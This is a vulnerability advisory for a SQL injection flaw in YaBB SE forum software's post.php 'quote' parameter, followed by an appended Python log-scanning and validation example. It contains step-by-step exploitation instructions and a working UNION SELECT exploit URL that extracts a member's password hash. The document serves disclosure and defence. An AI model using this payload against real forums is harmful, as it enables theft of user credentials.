SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   YaBB SE
Vendors:   YaBBSE.org
YaBB SE 'post.php' Input Validation Flaw Permits SQL Injection
SecurityTracker Alert ID:  1009078
SecurityTracker URL:  http://securitytracker.com/id/1009078
CVE Reference:   CVE-2004-0291
Updated:  Mar 26 2004
Original Entry Date:  Feb 17 2004
Impact:   Disclosure of user information, Execution of arbitrary code via network
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.5.4, 1.5.5; possibly other versions
Description:   An input validation vulnerability was reported in YaBB SE in the 'post.php' file. A remote authenticated user can inject SQL commands.

It is reported that the 'quote' parameter is not properly validated. A remote authenticated user can submit a specially crafted URL to execute SQL commands on the underlying database. A demonstration exploit URL to obtain a user's hashed password is provided:

http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

The vendor was reportedly notified on January 23, 2004.

Impact:   A remote user can execute SQL queries on the target system's database.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided an unofficial fix in the Source Message.

Vendor URL:  www.yabbse.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  Another YabbSE SQL Injection


Summary
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (Yet Another
Bulletin Board).

An SQL injection vulnerability allows a remote attacker to execute malicious
SQL statements on the database.

Details
Vulnerable Systems:
 * YaBB SE versions 1.5.4, 1.5.5, possibly others

The file Post.php is vulnerable to SQL injection because the quote parameter
is not checked for malicious input, so it is possible to inject SQL.

How To Exploit the vulnerability:

1- You need to be a registered user to exploit this hole.
2- Click any board you see, e.g. General Discussion.
3- Click any message, e.g. Welcome to YaBB SE!
4- Now view the source code of this page and search for the string "sesc"
(without the quotes). This is the session id, a hex number of 32 characters,
e.g. 13a478d8aa161c2231e6d3b36b6d19f2; you'll need this later.
5- Now your URL is something like this:
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- Change your URL to look like this:

http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

The value of sesc is the value you got earlier from the source code.

The Subject text box will then contain something like this:
Re:e320774659b1b23333bd033754d21bc4


Vendor Status:
January 23, 2004: I contacted the vendor.
January 23, 2004: Vendor says they are working on it.
January 29, 2004: I sent another email to ask how the work was progressing.
No response.
February 3, 2004: I sent another email to ask about the status of the work.
February 4, 2004: Vendor says they'll figure out how to do it.
February 16, 2004: I don't want to keep waiting, so I am publishing the
vulnerability.

Temporary Solution:

Open Post.php and go to around line 49.

You'll see something like this:

 $quotemsg = $quote;


Change it to this:

 // Reject any quote value that is not numeric before it reaches the query.
 // Note: this also rejects an empty $quote (a new post rather than a reply);
 // see the editor's note below for the refined condition.
 if ( !is_numeric($quote) )
 {
    die('Go out C==|=======>');
 }

 $quotemsg = $quote;

That's it.


Credits go to: BackSpace



[Editor's note:  Another user (Mike Bobbitt) reports that the if statement in 
the fix should instead say: 'if ( $quote && !is_numeric($quote) )']
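As an added example (not part of the report or of YaBB SE's code), the refined allow-list check from the editor's note applied on the defender's side: a parser for YaBB SE's ';'-separated index.php parameters, a strict numeric-id check for 'quote', and a scan over constructed access-log lines that flags requests whose 'quote' value would not pass it. The log lines, client addresses and function names are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# YaBB SE separates its index.php parameters with ';' rather than '&', so a
# query-string parser that splits on '&' would see one giant key. This
# helper (constructed for the example) splits the way the forum does.
def parse_yabbse_query(url: str) -> dict:
    query = url.split('?', 1)[1] if '?' in url else ''
    params = {}
    for part in query.split(';'):
        if part:
            key, _, value = part.partition('=')
            params[unquote_plus(key)] = unquote_plus(value)
    return params

# Allow-list check in the spirit of the refined fix: an empty quote (a new
# post rather than a reply) passes, otherwise only a bare integer message
# id does. Stricter than PHP's is_numeric(), which also accepts signs,
# decimals and exponents.
def quote_is_valid(value: str) -> bool:
    return value == '' or re.fullmatch(r'\d+', value) is not None

# Constructed access-log lines (common log format): a normal reply, the
# injection URL from the report, and a plain thread view.
SAMPLE_LOG = (
    '10.0.0.5 - - [17/Feb/2004:10:01:02 +0000] "GET /yabbse/index.php'
    '?board=1;action=post;threadid=1;quote=12 HTTP/1.1" 200 5120\n'
    '10.0.0.9 - - [17/Feb/2004:10:03:44 +0000] "GET /yabbse//index.php'
    '?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;'
    'title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,'
    'null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/* HTTP/1.1"'
    ' 200 6144\n'
    '10.0.0.5 - - [17/Feb/2004:10:05:10 +0000] "GET /yabbse/index.php'
    '?board=1;action=display;threadid=1 HTTP/1.1" 200 4096\n'
)

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*"')

# Return (client ip, decoded quote value) for every index.php request whose
# 'quote' parameter would fail the allow-list check.
def find_suspicious_quotes(log_text: str) -> list:
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or 'index.php' not in m.group('url'):
            continue
        params = parse_yabbse_query(m.group('url'))
        if 'quote' in params and not quote_is_valid(params['quote']):
            hits.append((m.group('ip'), params['quote']))
    return hits
```

Running find_suspicious_quotes(SAMPLE_LOG) flags only the second line, with the decoded UNION SELECT payload as the offending quote value.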


Copyright 2021, SecurityGlobal.net LLC